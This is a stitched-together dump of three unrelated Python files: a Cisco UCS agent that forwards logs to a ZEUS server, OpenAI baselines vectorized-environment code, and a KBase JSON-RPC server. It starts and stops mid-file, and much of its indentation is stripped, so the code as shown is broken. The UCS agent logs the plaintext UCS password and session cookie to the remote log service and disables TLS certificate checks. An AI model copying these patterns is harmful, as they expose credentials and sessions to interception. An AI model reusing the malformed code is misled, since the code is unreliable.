help="Password of UCS \n(default: %s)" % conf.UCS_PASSWD)
parser.add_argument("-s", "--secure", nargs="?", type=bool,
default=conf.IS_SECURE,
help="Secure of connection. \n(default: %s)" % conf.IS_SECURE)
parser.add_argument("-P", "--port", nargs="?", type=int,
default=conf.PORT,
help="Port of TCP socket. \n(default: %d)" % conf.PORT)
parser.add_argument("-l", "--log_level", nargs="?", type=str,
default=conf.LOG_LEVEL,
help="Level of log: CRITICAL, ERROR, WARN, WARNING,"
"INFO, DEBUG, NOTSET \n(default: %s)" % conf.LOG_LEVEL)
parser.add_argument("-t", "--token", nargs="?", type=str,
default=conf.ZEUS_TOKEN,
help="Token of ZEUS API.")
parser.add_argument("-z", "--zeus", nargs="?", type=str,
default=conf.ZEUS_SERVER,
help="""IP or host name of ZEUS server.
\n(default: %s)""" % conf.ZEUS_SERVER)
args = parser.parse_args()
return args
def check_level(self, loglevel):
level = getattr(logging, loglevel.upper(), None)
if not isinstance(level, int):
raise ValueError('Invalid log level: %s' % loglevel)
return level
def set_log_level(self, loglevel):
level = self.check_level(loglevel)
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
level=level)
self.logger = logging.getLogger("USC-Agent")
def submit(self, msg, name="ucs"):
# check name: All log names must have only letters and numbers
if re.match('^[A-Za-z0-9]+$', name):
# send log to zeus.
return self.zeus_client.sendLog(name, msg)
else:
self.logger.error("""Name error: %s.
All log names must have only letters
and numbers (A-Za-z0-9).""" % name)
return None
def add_log(self, loglevel, name, msg, *args):
level = self.check_level(loglevel)
if self.logger.isEnabledFor(level):
self.logger._log(level, msg, args)
# submit data to zeus
return self.submit(msg, name)
def to_json(self, dn):
    # return a JSON-serializable dict for the managed object or method
    json_dict = {'class_id': dn._class_id}
    internal_props = ManagedObject.__dict__['_ManagedObject__internal_prop']
    if isinstance(dn, ExternalMethod):
        for prop, prop_value in sorted(ucsgenutils.iteritems(dn.__dict__)):
            if prop in internal_props or prop.startswith("_ManagedObject__"):
                continue
            if "ExternalMethod" in prop:
                continue
            json_dict[prop] = prop_value
        return json_dict
    if isinstance(dn, ManagedObject):
        for prop, prop_value in sorted(ucsgenutils.iteritems(dn.__dict__)):
            if prop in internal_props or prop.startswith("_ManagedObject__"):
                continue
            if prop in dn.__dict__['_ManagedObject__xtra_props']:
                prop = "[X]" + str(prop)
            json_dict[prop] = prop_value
        return json_dict
def get_dn_conf(self):
log_list = []
for class_id in self.class_ids:
xml_req = ucsmethodfactory.config_find_dns_by_class_id(
self.handler.cookie, class_id, in_filter=None)
self.dn_obj_list = self.handler.process_xml_elem(xml_req)
for dn in self.dn_obj_list:
dn_config = self.handler.query_dn(dn.value)
log_list.append(self.to_json(dn_config))
# use the self.to_json temporary until ucsmsdk provides this method.
self.len = len(log_list)
if self.len >= self.args.Count:
self.add_log("DEBUG", "ucs", log_list)
log_list = []
self.count += self.len
self.logger.info("%s configuration records sent." % self.count)
if self.len:
self.add_log("DEBUG", "ucs", log_list)
self.count += self.len
self.logger.info("%s configuration records sent." % self.count)
def submit_async_events(self, response):
self.event_string += response
while len(self.event_string) > 0:
str_list = self.event_string.split("\n", 1)
length = int(str_list[0])
event_str = str_list[1]
if len(event_str) >= length:
event = event_str[:length]
# convert xml str to json and send to zeus.
self.add_log("DEBUG", "ucs", json.dumps(xmltodict.parse(event)))
# new event string starts from the end of last event.
self.event_string = event_str[length:]
else:
# wait for entire content.
break
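# Framing sketch (payload illustrative): each async UCS event arrives as
#   "<byte-length>\n<xml document of exactly that many bytes>"
# e.g. "85\n<configMoChangeEvent ...>...</configMoChangeEvent>", so the
# buffer above only flushes once a complete document has accumulated.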
def subscribe_events(self):
self.listener = pycurl.Curl()
post_data = """<eventSubscribe cookie="%s"/>""" % self.cookie
self.listener.setopt(self.listener.POSTFIELDS, post_data)
self.listener.setopt(self.listener.URL, self.url)
self.listener.setopt(self.listener.WRITEFUNCTION,
self.submit_async_events)
self.listener.setopt(pycurl.SSL_VERIFYPEER, 0)
self.listener.setopt(pycurl.SSL_VERIFYHOST, 0)
self.listener.perform()
def unsubscribe_events(self):
xml_req = ucsmethodfactory.event_unsubscribe(self.handler.cookie)
res = self.handler.process_xml_elem(xml_req)
self.add_log("DEBUG", "ucs", msg=self.to_json(res))
self.logger.info("Unsubscribe events of UCSM.")
def event_loop(self):
# Maintain a client to listen to UCS's async notification.
# when receive events, sent them to zeus.
try:
self.sub_thread = threading.Thread(target=self.subscribe_events)
self.sub_thread.setDaemon(True)
self.sub_thread.start()
while threading.activeCount() > 0:
sleep(1)
except KeyboardInterrupt:
self.logger.info("KeyboardInterrupt")
finally:
self.unsubscribe_events()
def set_up(self):
# get arguments
self.args = self.get_args()
# set log level
self.set_log_level(self.args.log_level)
self.host = self.args.ucs
if self.args.secure == True:
self.url = 'https://%s/nuova' % self.args.ucs
else:
self.url = 'http://%s/nuova' % self.args.ucs
self.user = self.args.user
self.passwd = self.args.password
self.token = self.args.token
self.zeus_server = self.args.zeus
# set up a Zeus client to submit log to Zeus.
self.logger.info("Initiating Zeus connection...")
self.zeus_client = client.ZeusClient(self.token, self.zeus_server)
# set up a http client to UCS server.
self.logger.info("Initiating UCSM connection...")
self.handler = UcsHandle(self.host, self.user, self.passwd,
port=self.args.port, secure=self.args.secure)
# login to ucs
self.handler.login(auto_refresh=True)
self.add_log("DEBUG", "ucs",
msg={"User": self.user, "Password": self.passwd,
"cookie": self.handler.cookie})
self.logger.info("Login UCSM completed.")
self.logger.info("Getting configuration data...")
self.get_dn_conf()
self.logger.info("Listening to UCSM events...")
self.event_loop()
def close(self):
self.handler.logout()
self.add_log('DEBUG', "ucs",
msg={"User": self.user, "Password": self.passwd,
"cookie": self.handler.cookie})
self.logger.info("UCSM connection is ended.")
if __name__ == "__main__":
ucs_plugin = UCSAgent()
ucs_plugin.set_up()
ucs_plugin.close()
|
multiprocessing_env.py
|
# Code is from OpenAI baseline.
#https://github.com/openai/baselines/tree/master/baselines/common/vec_env
import numpy as np
from multiprocessing import Process, Pipe
class RunningMeanStd(object):
# https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
def __init__(self, epsilon=1e-4, shape=()):
self.mean = np.zeros(shape, 'float64')
self.var = np.ones(shape, 'float64')
self.count = epsilon
def update(self, x):
batch_mean = np.mean(x, axis=0)
batch_var = np.var(x, axis=0)
batch_count = x.shape[0]
self.update_from_moments(batch_mean, batch_var, batch_count)
def update_from_moments(self, batch_mean, batch_var, batch_count):
delta = batch_mean - self.mean
tot_count = self.count + batch_count
new_mean = self.mean + delta * batch_count / tot_count
m_a = self.var * (self.count)
m_b = batch_var * (batch_count)
M2 = m_a + m_b + np.square(delta) * self.count * batch_count / (self.count + batch_count)
new_var = M2 / (self.count + batch_count)
new_count = batch_count + self.count
self.mean = new_mean
self.var = new_var
self.count = new_count
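# Quick self-check (illustrative; not part of the original baselines code):
# merging per-batch moments via update() should match the moments of the
# concatenated data, up to the tiny epsilon prior used at initialization.
def _running_mean_std_check():
    rng = np.random.RandomState(0)
    a, b = rng.randn(100, 3), rng.randn(50, 3)
    rms = RunningMeanStd(shape=(3,))
    rms.update(a)
    rms.update(b)
    both = np.concatenate([a, b], axis=0)
    assert np.allclose(rms.mean, both.mean(axis=0), atol=1e-3)
    assert np.allclose(rms.var, both.var(axis=0), atol=1e-3)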
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class VecEnvWrapper(VecEnv):
def __init__(self, venv, observation_space=None, action_space=None):
self.venv = venv
VecEnv.__init__(self,
num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space)
def step_async(self, actions):
self.venv.step_async(actions)
def reset(self):
pass
def step_wait(self):
pass
def close(self):
return self.venv.close()
def render(self):
self.venv.render()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
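# Usage sketch (assumes cloudpickle is installed): plain pickle rejects the
# lambdas/closures typically passed as env factories, so they travel wrapped:
#   wrapped = CloudpickleWrapper(lambda: gym.make("CartPole-v1"))  # example id
# and the worker unwraps them by calling env_fn_wrapper.x().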
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
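# Minimal usage sketch (assumes gym is installed; the env id is an example):
#   venv = SubprocVecEnv([lambda: gym.make("CartPole-v1") for _ in range(4)])
#   obs = venv.reset()                    # shape: (4,) + observation_space.shape
#   obs, rews, dones, infos = venv.step([venv.action_space.sample()] * 4)
#   venv.close()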
class VecNormalize(VecEnvWrapper):
"""
Vectorized environment base class
"""
def __init__(self, venv, ob=True, ret=True, clipob=10., cliprew=10., gamma=0.99, epsilon=1e-8):
VecEnvWrapper.__init__(self, venv)
self.ob_rms = RunningMeanStd(shape=self.observation_space.shape) if ob else None
self.ret_rms = RunningMeanStd(shape=()) if ret else None
self.clipob = clipob
self.cliprew = cliprew
self.ret = np.zeros(self.num_envs)
self.gamma = gamma
self.epsilon = epsilon
def step_wait(self):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
obs, rews, news, infos = self.venv.step_wait()
self.ret = self.ret * self.gamma + rews
obs = self._obfilt(obs)
if self.ret_rms:
self.ret_rms.update(self.ret)
rews = np.clip(rews / np.sqrt(self.ret_rms.var + self.epsilon), -self.cliprew, self.cliprew)
return obs, rews, news, infos
def _obfilt(self, obs):
if self.ob_rms:
self.ob_rms.update(obs)
obs = np.clip((obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clipob, self.clipob)
return obs
else:
return obs
def reset(self):
"""
Reset all environments
"""
obs = self.venv.reset()
return self._obfilt(obs)
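# Usage sketch: VecNormalize(SubprocVecEnv(env_fns)) maintains running
# mean/std of observations and of the discounted return; both are clipped to
# +/-10 by default, and rewards are scaled by the return's std but not
# mean-centered.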
from gym import spaces
from collections import OrderedDict
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
shapes, dtypes = {}, {}
self.keys = []
obs_space = env.observation_space
subspaces = {None: obs_space}
for key, box in subspaces.items():
shapes[key] = box.shape
dtypes[key] = np.float32
self.keys.append(key)
self.buf_obs = { k: np.zeros((self.num_envs,) + tuple(shapes[k]), dtype=dtypes[k]) for k in self.keys }
self.buf_dones = np.zeros((self.num_envs,), dtype=np.bool)
self.buf_rews = np.zeros((self.num_envs,), dtype=np.float32)
self.buf_infos = [{} for _ in range(self.num_envs)]
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
for e in range(self.num_envs):
obs, self.buf_rews[e], self.buf_dones[e], self.buf_infos[e] = self.envs[e].step(self.actions[e])
if self.buf_dones[e]:
obs = self.envs[e].reset()
self._save_obs(e, obs)
return (self._obs_from_buf(), np.copy(self.buf_rews), np.copy(self.buf_dones),
self.buf_infos.copy())
def reset(self):
for e in range(self.num_envs):
obs = self.envs[e].reset()
self._save_obs(e, obs)
return self._obs_from_buf()
def close(self):
return
def render(self, mode='human'):
return [e.render(mode=mode) for e in self.envs]
def _save_obs(self, e, obs):
for k in self.keys:
if k is None:
self.buf_obs[k][e] = obs
else:
self.buf_obs[k][e] = obs[k]
def _obs_from_buf(self):
if self.keys==[None]:
return self.buf_obs[None]
else:
return self.buf_obs
|
minimal_synthetic_communityServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from minimal_synthetic_community.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'minimal_synthetic_community'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from minimal_synthetic_community.minimal_synthetic_communityImpl import minimal_synthetic_community # noqa @IgnorePep8
impl_minimal_synthetic_community = minimal_synthetic_community(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
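# Usage sketch: json.dumps({"ids": {1, 2, 3}}, cls=JSONObjectEncoder) emits the
# set as a JSON list, which the stock encoder would reject as unserializable.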
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
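# Illustrative sketch: the two request shapes call_py() accepts. A dict is a
# single call and a list is a batch; both are assumed to be deserialized
# already. The method name and id values are hypothetical.
def _example_rpc_payloads():
    single = {'version': '1.1',
              'method': 'minimal_synthetic_community.status',
              'params': [],
              'id': '12345'}
    batch = [single, dict(single, id='12346')]
    return single, batch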
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
        self._debug_levels = {7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'}
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
    def log_debug(self, message, level=1):
        if level not in self._debug_levels:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
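# Illustrative sketch: the JSON-RPC 1.1 body that MethodContext.provenance()
# POSTs to the callback server when SDK_CALLBACK_URL is set. The id value is
# hypothetical.
def _example_provenance_request_body():
    return json.dumps({'method': 'CallbackServer.get_provenance',
                       'params': [],
                       'version': '1.1',
                       'id': '4159265358979'})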
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
    def __init__(self, name, code, message, data=None, error=None):
        super(ServerError, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
    if trustXHeaders:
        if xFF:
            return xFF.split(',')[0].strip()
        if realIP:
            return realIP.strip()
return environ.get('REMOTE_ADDR')
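# Illustrative sketch: how getIPAddress resolves the client address from a
# WSGI environ. The header values below are hypothetical.
def _example_get_ip_address():
    environ = {'HTTP_X_FORWARDED_FOR': '203.0.113.5, 10.0.0.2',
               'REMOTE_ADDR': '10.0.0.1'}
    # with trusted X headers this returns the first forwarded hop,
    # '203.0.113.5'; otherwise it falls back to REMOTE_ADDR
    return getIPAddress(environ)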
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'minimal_synthetic_community'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_minimal_synthetic_community.run_minimal_synthetic_community,
name='minimal_synthetic_community.run_minimal_synthetic_community',
types=[dict])
self.method_authentication['minimal_synthetic_community.run_minimal_synthetic_community'] = 'required' # noqa
self.rpc_service.add(impl_minimal_synthetic_community.status,
name='minimal_synthetic_community.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
        except ValueError:
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'minimal_synthetic_community ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python WSGI reference server
# listening on port 9999 (the default), execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be async
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
    global _proc
    if not _proc:
        raise RuntimeError('server is not running')
    _proc.terminate()
    _proc = None
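# Illustrative sketch: running the server in a child process so that
# stop_server() can be used; port=0 requests a system-assigned port.
def _example_server_lifecycle():
    port = start_server(host='localhost', port=0, newprocess=True)
    # ... issue JSON-RPC requests against http://localhost:<port> ...
    stop_server()
    return port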
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
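# Illustrative sketch: the minimal input-file shape process_async_cli()
# expects; 'version' and 'id' are filled in when missing. The path and the
# method name are hypothetical.
def _example_async_cli_request(path='/tmp/input.json'):
    req = {'method': 'minimal_synthetic_community.status', 'params': []}
    with open(path, 'w') as f:
        json.dump(req, f)
    return path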
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
